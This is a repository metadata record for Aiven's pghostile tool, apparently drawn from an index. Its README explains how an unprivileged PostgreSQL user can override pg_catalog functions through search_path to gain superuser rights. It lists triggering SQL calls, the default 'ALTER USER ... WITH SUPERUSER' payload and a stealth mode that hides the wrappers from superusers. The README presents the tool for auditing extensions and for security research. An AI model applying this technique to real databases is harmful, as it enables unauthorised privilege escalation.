{"id":19693873,"url":"https://github.com/aiven-open/pghostile","last_synced_at":"2025-04-29T10:30:39.733Z","repository":{"id":146304109,"uuid":"512732159","full_name":"Aiven-Open/pghostile","owner":"Aiven-Open","description":"Pghostile is a tool to automate the exploitation of PostgreSQL® specific vulnerabilities that could lead to privilege escalation. It can be used to identify security issues in PostgreSQL extensions, to test system hardening and for security research in general.","archived":false,"fork":false,"pushed_at":"2023-08-17T09:21:12.000Z","size":66,"stargazers_count":12,"open_issues_count":0,"forks_count":2,"subscribers_count":13,"default_branch":"main","last_synced_at":"2025-04-05T14:51:13.844Z","etag":null,"topics":["exploitation","postgresql","security","security-audit","security-tools"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"postgresql","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Aiven-Open.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null}},"created_at":"2022-07-11T11:39:53.000Z","updated_at":"2025-02-15T18:14:51.000Z","dependencies_parsed_at":"2023-08-17T10:25:34.247Z","dependency_job_id":null,"html_url":"https://github.com/Aiven-Open/pghostile","commit_stats":null,"previous_names":["aiven-open/pghostile"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Aiven-Open%2Fpghostile","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Aiven-Open%2Fpghostile/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Aiven-Open%2Fpghostile/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Aiven-Open%2Fpghostile/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Aiven-Open","download_url":"https://codeload.github.com/Aiven-Open/pghostile/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":251483633,"owners_count":21596575,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exploitation","postgresql","security","security-audit","security-tools"],"created_at":"2024-11-11T19:18:32.006Z","updated_at":"2025-04-29T10:30:38.878Z","avatar_url":"https://github.com/Aiven-Open.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# PGHOSTILE\nPghostile can make PostgreSQL® an hostile environment for superusers and a nice playground for attackers.\nPghostile is an automated tool for overriding \"system\" functions (the ones from the 'pg_catalog' schema) allowing an attacker to elevate privileges if/when these functions are called by a superuser.\n\nIt can be also used to test the security of the PostgreSQL extension. You can run pghostile to create the \"exploit functions\" and then run the extension's unit tests and see if you get superuser power after that.\n\nSee our blog post about pghostile and PostgreSQL extension security: [Aiven's Blog](https://aiven.io/blog/aiven-security-agent-for-postgresql).\n\n## How it works\nIn PostgreSQL every function is identified by it's name plus the number/types of arguments (like in Java). If a function is defined to accept a numberic value and you define a function with the same name that accepts an integer, your function will be called if the input parameter is an integer and the original one will be called if the input is a float.\nConsidering that an unprivileged user can create functions in the public schema and that the public schema is part of the 'search_path', it's relatively easy to trick a superuser to run code from public instead of pg_catalog.\n\nIn a few words, pghostile searches pg_catalog for functions (and operators) that can be overridden and creates a malicious wrapper of them in the public schema.\n\nCurrently, it can identify ~1000 calls that can lead to privilege escalation. To give an example, the list below contains some of them:\n```SQL\nselect 1.1 * 1;\nselect 1 = 1.1;\nselect 1.1 / 1;\nselect array [1, 2] = array [1, 2];\n\nselect sha256('randstr');\nselect unnest(array [1, 2]);\nselect array_replace(array [1, 2], 1, 1);\nselect date_cmp('2022-07-12', '2022-07-12');\nselect time_cmp('00:00:00', '00:00:00');\nselect varcharout('randstr');\nselect round(1, 1);\nselect floor(1);\nselect power(1, 1);\nselect int4(1);\nselect div(1, 1);\nselect format('randstr', 1);\nselect pg_sleep(1.1);\nselect inet_out('10.0.0.1');\nselect hashmacaddr('01:01:01:02:02:02');\nselect hashinet('10.0.0.1');\nselect xml_out('\u003cfoo /\u003e');\nselect json_out('[true]');\nselect uuid_out('93967025-8c89-4320-ad51-4ef50694502f');\n```\n\nThen, if the superuser runs something like `select sha256('test123')` you will be superuser in no time ;)\n\n## Usage\n```\npositional arguments:\n  db_username           Database username\n  db_name               Database name\n\noptional arguments:\n  -h, --help            show this help message and exit\n  -X, --disable-exploits-creation\n                        Do not create exploit functions\n  -H DB_HOST, --db-host DB_HOST\n                        Database host (default 127.0.0.1)\n  -p DB_PORT, --db-port DB_PORT\n                        Database port\n  -P, --ask-pass        Prompt for database passsword\n  -o OUT, --out OUT     Output dir (deafult ./out)\n  -T, --skip-tests      Disable test\n  -s, --disable-stealth-mode\n                        Disable stealth mode\n  -S DB_SSL_MODE, --db-ssl-mode DB_SSL_MODE\n                        Database ssl mode (default None)\n  -x EXPLOIT_PAYLOAD, --exploit-payload EXPLOIT_PAYLOAD\n                        The SQL commands\n  -t, --track-execution\n                        Track the exploit function execution\n  -O, --no-overwrite    Stop execution if at least one exploit function already exists\n```\n\nWith the -X option you can disable the actual exploit creation. It will just run the tests to see which functions can be overridden.\nWith the -T option you can disable the tests and just create the exploit functions.\nThe -x option allows you to specify what SQL command(s) should be used in your exploit. By default it's ```ALTER USER \u003cdb_username\u003e WITH SUPERUSER;```.\nThe -s option disables the \"stealth mode\". In stealth mode the wrapping functions will call the original function from pg_catalog, in this way the superuser won't see any anomaly when calling a wrapped function. There are also less chances to break execution flows that could bring us to other vulnerable points.\nThe -t option enables the tracking of the execution of the exploit functions. It means that every successfull call of an exploit function is logged into a table of the current DB (pghostile.triggers). It's useful for extension analisys.\nThe -p option forces the DB's password request even if the PGPASSWORD environment variable is set.\n\n### Example\n```\npghostile.py user1 testdb -H 10.0.0.100\n```\n```\nStarting ...\n\n[ * ] 1272 interesting functions have been identified\n[ * ] Detecting operators\n[ * ] Testing 1697 functions\n[ * ] 907 exploitable functions found\n[ * ] 1005 function and parameters combinations run successfully\n[ * ] 70 operators call run successfully\n[ * ] Creating exploit functions\n[ * ] Done!\n\n907 functions have been created\n1075 queries can trigger the exploit\nThe './out' folder contains the output\n```\n\n## PG Extension audit\nPghostile can be used to audit the security of PostgreSQL extensions:\n1. Run pghostile with the '-t' option to enable execution tracking\n```\npghostile.py -t user1 testdb\n```\n2. Run, as superuser, as many extension's queries/functions as possible\n```\npsql -U postgres testdb \u003c extension_queries.sql\n```\n3. Check if you are superuser\n```sql\nSELECT rolsuper FROM pg_roles where rolname='user1'\n```\n4. If you are superuser, all the functions that triggered the exploit are listed in:\n```sql\nselect * from pghostile.triggers\n```\n\n## Trademarks\nThe terms Postgres and PostgreSQL are registered trademarks of the PostgreSQL Community Association of Canada.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Faiven-open%2Fpghostile","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Faiven-open%2Fpghostile","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Faiven-open%2Fpghostile/lists"}